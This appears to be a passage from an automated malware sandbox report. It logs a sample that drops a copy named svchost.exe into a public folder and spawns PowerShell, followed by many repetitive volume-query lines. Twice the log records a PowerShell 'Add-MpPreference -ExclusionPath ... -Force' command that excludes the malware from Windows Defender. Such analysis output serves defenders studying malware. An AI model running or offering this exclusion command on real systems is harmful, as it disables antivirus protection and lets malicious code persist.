    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
    Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 2096
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.326216466.0000000001000000.00000002.00020000.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.563984820.0000000003427000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.439027452.0000000001390000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000000.450667404.0000000001D90000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.326216466.0000000001000000.00000002.00020000.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.562247125.0000000001940000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000000.439027452.0000000001390000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000000.450667404.0000000001D90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.326216466.0000000001000000.00000002.00020000.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.562247125.0000000001940000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000000.439027452.0000000001390000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000000.450667404.0000000001D90000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: p9Ts9VV2NZ.exe, 00000000.00000000.326216466.0000000001000000.00000002.00020000.sdmp, p9Ts9VV2NZ.exe, 00000009.00000002.562247125.0000000001940000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000000.439027452.0000000001390000.00000002.00020000.sdmp, svchost.exe, 0000000F.00000000.450667404.0000000001D90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Users\user\Desktop\p9Ts9VV2NZ.exe VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
